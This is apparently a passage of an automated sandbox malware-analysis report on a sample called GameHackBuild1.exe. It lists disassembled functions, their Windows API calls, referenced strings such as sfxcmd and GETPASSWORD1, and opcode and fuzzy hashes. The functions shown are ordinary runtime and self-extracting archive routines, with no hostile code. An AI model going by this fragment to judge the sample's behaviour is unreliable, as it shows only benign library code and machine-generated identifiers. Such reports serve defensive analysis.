                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: 2796c8691780d805ac07c91dedc57de8d9f7a98800187e1a3340d9f7bf96c0e1
                                      • Instruction ID: 3e49efab8a29cff392eb9035400746899b2c6705038d0b70f6941df21c908014
                                      • Opcode Fuzzy Hash: 2796c8691780d805ac07c91dedc57de8d9f7a98800187e1a3340d9f7bf96c0e1
                                      • Instruction Fuzzy Hash: 5601787210EB342B9332A3BC7E8592B262D9BC1F71B200038F506D2292EF38CC021060
                                      Function 00A1075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A10A41: ResetEvent.KERNEL32(?), ref: 00A10A53
                                        • Part of subcall function 00A10A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00A10A67
                                      • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00A1078F
                                      • CloseHandle.KERNEL32(?,?), ref: 00A107A9
                                      • DeleteCriticalSection.KERNEL32(?), ref: 00A107C2
                                      • CloseHandle.KERNEL32(?), ref: 00A107CE
                                      • CloseHandle.KERNEL32(?), ref: 00A107DA
                                        • Part of subcall function 00A1084E: WaitForSingleObject.KERNEL32(?,000000FF,00A1096D,?,?,00A109EF,?,?,?,?,?,00A109D9), ref: 00A10854
                                        • Part of subcall function 00A1084E: GetLastError.KERNEL32(?,?,00A109EF,?,?,?,?,?,00A109D9), ref: 00A10860
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                      • String ID:
                                      • API String ID: 1868215902-0
                                      • Opcode ID: ab9ca01c23941eb7cde63fde085a5e4a83b0278d63ca2c78346bc373a99895d7
                                      • Instruction ID: 99355d5792e252be3104139abfa2a3e015d3ae031727a0a2002380a9d8fecf54
                                      • Opcode Fuzzy Hash: ab9ca01c23941eb7cde63fde085a5e4a83b0278d63ca2c78346bc373a99895d7
                                      • Instruction Fuzzy Hash: 10019272544B04EBCB22DB65DD84FC6BBE9FB49711F000519F15A821A0CBB56A85CB90
                                      Function 00A2BF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00A2BF28
                                        • Part of subcall function 00A284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A2BFA7,?,00000000,?,00000000,?,00A2BFCE,?,00000007,?,?,00A2C3CB,?), ref: 00A284F4
                                        • Part of subcall function 00A284DE: GetLastError.KERNEL32(?,?,00A2BFA7,?,00000000,?,00000000,?,00A2BFCE,?,00000007,?,?,00A2C3CB,?,?), ref: 00A28506
                                      • _free.LIBCMT ref: 00A2BF3A
                                      • _free.LIBCMT ref: 00A2BF4C
                                      • _free.LIBCMT ref: 00A2BF5E
                                      • _free.LIBCMT ref: 00A2BF70
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: b090a8909747f3aa616bddc4acf38b7336b7330bf595225a51d37b11e0bf249b
                                      • Instruction ID: 8b9cd57a0181cefb170ac7853303d56dfc6f7459f2638b98799b583ae9aa2b5b
                                      • Opcode Fuzzy Hash: b090a8909747f3aa616bddc4acf38b7336b7330bf595225a51d37b11e0bf249b
                                      • Instruction Fuzzy Hash: 73F01D32519225AB8620EBACFF86C1A73E9BA007507648869F448D7D94CB34FC818A64
                                      Function 00A28060 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00A2807E
                                        • Part of subcall function 00A284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A2BFA7,?,00000000,?,00000000,?,00A2BFCE,?,00000007,?,?,00A2C3CB,?), ref: 00A284F4
                                        • Part of subcall function 00A284DE: GetLastError.KERNEL32(?,?,00A2BFA7,?,00000000,?,00000000,?,00A2BFCE,?,00000007,?,?,00A2C3CB,?,?), ref: 00A28506
                                      • _free.LIBCMT ref: 00A28090
                                      • _free.LIBCMT ref: 00A280A3
                                      • _free.LIBCMT ref: 00A280B4
                                      • _free.LIBCMT ref: 00A280C5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: c94cd1f2edb1d5dabb5586b538214f149667919a30b255e71520bdc788fa6da8
                                      • Instruction ID: 570a1a738e00d6798d481f44c057efad0e0b2ecaa4e49316dfb9aa46e4c0f4f6
                                      • Opcode Fuzzy Hash: c94cd1f2edb1d5dabb5586b538214f149667919a30b255e71520bdc788fa6da8
                                      • Instruction Fuzzy Hash: 1CF017788021258B8751FFA9FD124453EB5F71472030C4A6AF40196AB4CF794857AFC1
                                      Function 00A276BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe,00000104), ref: 00A276FD
                                      • _free.LIBCMT ref: 00A277C8
                                      • _free.LIBCMT ref: 00A277D2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe
                                      • API String ID: 2506810119-2682362612
                                      • Opcode ID: 74f46e143a3e5a7ad7e75b0c28f6e14f81515f11e790a4765feab1c832297924
                                      • Instruction ID: 7e46cc17769923505871de2955bf336079fda331a755c9cdcbca6eec4cbeb626
                                      • Opcode Fuzzy Hash: 74f46e143a3e5a7ad7e75b0c28f6e14f81515f11e790a4765feab1c832297924
                                      • Instruction Fuzzy Hash: 3C318075A09228AFDB21DF9DED81D9EBBFCEB85310B1440B6F80497211D6B08F41CB90
                                      Function 00A07574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A07579
                                        • Part of subcall function 00A03B3D: __EH_prolog.LIBCMT ref: 00A03B42
                                      • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00A07640
                                        • Part of subcall function 00A07BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00A07C04
                                        • Part of subcall function 00A07BF5: GetLastError.KERNEL32 ref: 00A07C4A
                                        • Part of subcall function 00A07BF5: CloseHandle.KERNEL32(?), ref: 00A07C59
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                      • API String ID: 3813983858-639343689
                                      • Opcode ID: 350cdc474e98ac1e2b86d0ee151d2f2f2cd1dac5b3701ae7e1e159a553aef124
                                      • Instruction ID: bcce12181418df4bbc15599914e4e05fa449dc2b2f7685eaccd9b4e06baf8479
                                      • Opcode Fuzzy Hash: 350cdc474e98ac1e2b86d0ee151d2f2f2cd1dac5b3701ae7e1e159a553aef124
                                      • Instruction Fuzzy Hash: 6231C171D0824CAEDF20EBA4ED42FEE7B79AF55314F004055F446A71C2DBB16A45CB61
                                      Function 00A1A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A0130B: GetDlgItem.USER32(00000000,00003021), ref: 00A0134F
                                        • Part of subcall function 00A0130B: SetWindowTextW.USER32(00000000,00A335B4), ref: 00A01365
                                      • EndDialog.USER32(?,00000001), ref: 00A1A4B8
                                      • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00A1A4CD
                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 00A1A4E2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: ASKNEXTVOL
                                      • API String ID: 445417207-3402441367
                                      • Opcode ID: 90b6aee3fafbf9db1f7b9b28f71eb996966ce47d13c5c793c9192b8e6d27662e
                                      • Instruction ID: c26d13f12901658b447d81891dd4a11e90786770608b8ed5ee676bc6165319c4
                                      • Opcode Fuzzy Hash: 90b6aee3fafbf9db1f7b9b28f71eb996966ce47d13c5c793c9192b8e6d27662e
                                      • Instruction Fuzzy Hash: DF11B672245210BFD721DFE8EE4DFA67779EB6A740F140104F2819B0A0C7E69986D727
                                      Function 00A0D1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: __fprintf_l_strncpy
                                      • String ID: $%s$@%s
                                      • API String ID: 1857242416-834177443
                                      • Opcode ID: 4ef4b3d6e303f6cbdc186152572c21661a7dac8dcd58864ca1660fe3c6695e56
                                      • Instruction ID: b215db8c99f8790b702977b2b1a7b73775718c75fc184d2a7ec2d7310d4f8e8e
                                      • Opcode Fuzzy Hash: 4ef4b3d6e303f6cbdc186152572c21661a7dac8dcd58864ca1660fe3c6695e56
                                      • Instruction Fuzzy Hash: F4214D7344020CAAEF20DFE4ED46FEA7BA8AF18300F044522FA15961D2E771DA599B51
                                      Function 00A1A990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A0130B: GetDlgItem.USER32(00000000,00003021), ref: 00A0134F
                                        • Part of subcall function 00A0130B: SetWindowTextW.USER32(00000000,00A335B4), ref: 00A01365
                                      • EndDialog.USER32(?,00000001), ref: 00A1A9DE
                                      • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00A1A9F6
                                      • SetDlgItemTextW.USER32(?,00000067,?), ref: 00A1AA24
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: GETPASSWORD1
                                      • API String ID: 445417207-3292211884
                                      • Opcode ID: d6c9eb35164ffd3f2873bc844b4bee5537cc164f53fb9c4c428668d652599fc4
                                      • Instruction ID: 27c696d07fbaf6cd3eb1ca096157d4a070a87e453a649a3a81964c363ce17db2
                                      • Opcode Fuzzy Hash: d6c9eb35164ffd3f2873bc844b4bee5537cc164f53fb9c4c428668d652599fc4
                                      • Instruction Fuzzy Hash: 2C1108329411187ADB219B649E09FFA7B7CEF59741F010411FA45B20D0C2A19DD5D7A2
                                      Function 00A0B4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                      Download Yara Rule
                                      APIs
                                      • _swprintf.LIBCMT ref: 00A0B51E
                                        • Part of subcall function 00A0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A0401D
                                      • _wcschr.LIBVCRUNTIME ref: 00A0B53C
                                      • _wcschr.LIBVCRUNTIME ref: 00A0B54C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: _wcschr$__vswprintf_c_l_swprintf
                                      • String ID: %c:\
                                      • API String ID: 525462905-3142399695
                                      • Opcode ID: ca9b3fddb482971018a654a69bfcb278f422e2482329266506057ab351ba3df6
                                      • Instruction ID: c47d4204a6bacb4dd6b5965b738ceff805cdabd6e306989a06d56291ab813149
                                      • Opcode Fuzzy Hash: ca9b3fddb482971018a654a69bfcb278f422e2482329266506057ab351ba3df6
                                      • Instruction Fuzzy Hash: 360121639143157ACB205B79BE83C2BB7ACEE953607504456F946C70C1FB34E550C2B1
                                      Function 00A106BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                                      Download Yara Rule
                                      APIs
                                      • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00A0ABC5,00000008,?,00000000,?,00A0CB88,?,00000000), ref: 00A106F3
                                      • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00A0ABC5,00000008,?,00000000,?,00A0CB88,?,00000000), ref: 00A106FD
                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00A0ABC5,00000008,?,00000000,?,00A0CB88,?,00000000), ref: 00A1070D
                                      Strings
                                      • Thread pool initialization failed., xrefs: 00A10725
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                      • String ID: Thread pool initialization failed.
                                      • API String ID: 3340455307-2182114853
                                      • Opcode ID: 5f764cd97027339fb8f93f320e442ca5c4d6e633e512b3b345f5457646b4bf22
                                      • Instruction ID: 2f7c8624f67969ca665341f4295523b0fbcba0daa1d20b44c830c51c0f2a8115
                                      • Opcode Fuzzy Hash: 5f764cd97027339fb8f93f320e442ca5c4d6e633e512b3b345f5457646b4bf22
                                      • Instruction Fuzzy Hash: 651170B1504709AFC3215FA5DC84AE7FBECEF99755F10482EF1DA86240D6B169C1CB60
                                      Function 00A1D38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                      • API String ID: 0-56093855
                                      • Opcode ID: 73b0e87f1e3b822ee429f5461e6d2ff54018e9a6e31c829d6a647272649bee3e
                                      • Instruction ID: 3c3d68a82086f18f16d52c9afb6f046cb5c42dda0cc41e2d59dc633bc1a80e7d
                                      • Opcode Fuzzy Hash: 73b0e87f1e3b822ee429f5461e6d2ff54018e9a6e31c829d6a647272649bee3e
                                      • Instruction Fuzzy Hash: F601D479600245BFCB11CFA8FD04E9A3BA9FB49791F040425F905D2230C776AC91EBA1
                                      Function 00A1D287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00A1D29D
                                      • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00A1D2D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: EnvironmentVariable
                                      • String ID: sfxcmd$sfxpar
                                      • API String ID: 1431749950-3493335439
                                      • Opcode ID: 3e142e65bc64b631eb102d493b99540fd897e69eee7c5ba733427013700e0552
                                      • Instruction ID: 8014811b03e20c81f25ac1f8e53ac372371671496c397c97eef9ae6bae2c8bb0
                                      • Opcode Fuzzy Hash: 3e142e65bc64b631eb102d493b99540fd897e69eee7c5ba733427013700e0552
                                      • Instruction Fuzzy Hash: 23F0A77280522CAADB206FD49C0AEFA7768EF09781B000511FC4466141D671CD80D6F1
                                      Function 00A291DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: __alldvrm$_strrchr
                                      • String ID:
                                      • API String ID: 1036877536-0
                                      • Opcode ID: a1feb65eed64049cf25ee4642f159925efa9ad90842d97ad331c87beb28f585e
                                      • Instruction ID: 0e7dc247cb3aeef1d3c604c414c1679a4b15730a7f5d0a718d480d0fbdc74546
                                      • Opcode Fuzzy Hash: a1feb65eed64049cf25ee4642f159925efa9ad90842d97ad331c87beb28f585e
                                      • Instruction Fuzzy Hash: 2AA15672A003A69FEB21DF6CE8917EFBBE5EF55710F18417DE8859B281C2389942C750
                                      Function 00A0A2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00A080B7,?,?,?), ref: 00A0A351
                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00A080B7,?,?), ref: 00A0A395
                                      • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00A080B7,?,?,?,?,?,?,?,?), ref: 00A0A416
                                      • CloseHandle.KERNEL32(?,?,00000000,?,00A080B7,?,?,?,?,?,?,?,?,?,?,?), ref: 00A0A41D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: File$Create$CloseHandleTime
                                      • String ID:
                                      • API String ID: 2287278272-0
                                      • Opcode ID: 7c03cd2ec4f641202a4de512f20884a8c5f383a60739c8afe85cef733d2db172
                                      • Instruction ID: a3e0a11b95ad90cece9e22f022647ca581a6a22436f23bea814382d83aed1ca7
                                      • Opcode Fuzzy Hash: 7c03cd2ec4f641202a4de512f20884a8c5f383a60739c8afe85cef733d2db172
                                      • Instruction Fuzzy Hash: F441FE3124C388AAE731DF64EC55FEEBBE8ABA5300F04091CB5D0D71D1C6649A88DB13
